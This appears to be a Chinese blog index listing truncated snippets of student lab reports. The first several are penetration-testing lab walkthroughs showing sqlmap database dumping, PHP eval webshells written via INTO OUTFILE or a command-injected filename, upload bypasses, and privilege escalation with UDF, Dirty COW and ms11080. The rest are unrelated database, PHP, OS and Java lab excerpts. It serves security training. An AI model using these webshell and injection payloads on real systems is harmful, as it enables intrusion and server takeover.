下载工具包  打开目标机 通过目录爆破发现 phpmyadmin    在登录位置尝试注入 返现 可以注入 直接上sqlmap    上 bp 代理抓包 sqlmap.py  -r  bp.txt  --dbs   利用sqlmap 跑出root 密码  root666888 登录 phpmyadmin t通过路径报错得到绝对路径 c:\\www\\1.php   root  权限可以直接写一句话拿shell   让后进行udf 提权 一句话写入 菜刀连接  上传udf 提权  提权 发现 ne…

更具实验文件知道存在源码泄露  下载源码进行源码审计 发现admin账号 查看user.php 发现mysql 账号 端口 对登录后源码进行审计 发现上传文件的两处漏洞 对 fiel name 可以 %00 截断 上传一句话木马   对file name   shell_exec 未对参数过滤 可以拼接执行 命令 写一句话 例如 '|| echo "<?php eval($_POST[1])?>" >/var/www/html/2.php||' 菜刀连接 上传脏牛提权…

拿到靶场 直接进行扫描 爆破路径 发现 phpinfo, phpmyadmin  更具phpinfo 获取跟路径  也可以通过 输入错路径爆出绝对路径 phpmyamin  弱口令登录  root,root sql 直接写一句话木马 select  '<?php eval($_POST[1])?>' into outfile 'C:\\phpStudy\\WWW\\1.php' 菜刀连接   上传 ms11080.exe 提权 添加 90sec 用 mstsc 直接远程登录…

更具提示 先下载工具包 ip  172.16.12.226  打开bp 进行代理发现 整个页面 没有请求 没有其页面通过 御剑,dir ,hscan   进行目录爆破未发现有用信息    对当前页面进行代码审计发现png 二级图片路径 在对二级目录爆破 发现  upload.php 上传页面 尝试上传  把工具包内 上传    htaccess  内文件把 chopper.ccc 解析成php 文件 直接上传  返利他的dolowd.php 暴露上传后路径 直接菜刀连接 上传大马 md5解密 …

shutdown immediateORA-01097: 无法在事务处理过程中关闭 - 请首先提交或回退 解决:先 "commit" 实验四 SQL Production :: Copyright (c) , , Oracle. All rights reserved. 请输入用户名: system 输入口令: 连接到: Oracle - 64bit Production With the Partitioning, OLAP, Data Mining and Real Applica…

实验四 1.创建一个Person类,Person中包含三个属性name,age,wealth,分别设置为public,private,protected,再定义Person类的子类Student. 2.在PHP代码中引用这三个属性, a.在Person类中使用,b.在Person类的外面使用,c.在Person类的子类Student类中使用.在这三个地方中能不能正常使用?如果有错误,请说明错误提示和错误原因. 3.在上述Person类中增加两个方法,eat()和consume(),编写测试语句,…

实验四 简单的PV操作 专业 网络工程   姓名 方俊晖 学号 201406114309 一.        实验目的 1.掌握临界区的概念及临界区的设计原则: 2.掌握信号量的概念.PV操作的含义以及应用PV操作实现进程的同步与互斥: 3.分析进程争用资源的现象,学习解决进程互斥的方法. 二.        实验内容和要求 分析进程的同步与互斥现象,编程实现经典的进程同步问题——生产者消费者问题的模拟 生产者--消费者问题表述: 有一环形缓冲池,包含n个缓冲区(0~n-1). 有两类进程:一组…

20145113 Java实验四 快捷键 之前没怎么记ISDEA的快捷键,但是熟练使用快捷键可以带来很多的便利,于是先开始学习一些常用的快捷键,就采用它默认的快捷键,这样后期就不会出现冲突,一些android独有的快捷方式也可以使用. (一) 1.打印log:logt logd logm loge 2.代码提示:ctrl+alt+space 3.代码向上向下移动:ctrl+shif+up/down 4.复制当行到下一行:ctrl+D 5.删除:ctrl+y 6.在类的方法中移动alt+up/do…

20145316&20145229实验四:驱动程序设计 结对伙伴:20145316 许心远 博客链接:http://www.cnblogs.com/xxy745214935/p/6130871.html…

20145301&20145321&20145335实验四 这次实验我的组员为:20145301赵嘉鑫.20145321曾子誉.20145335郝昊 实验内容详见:实验四…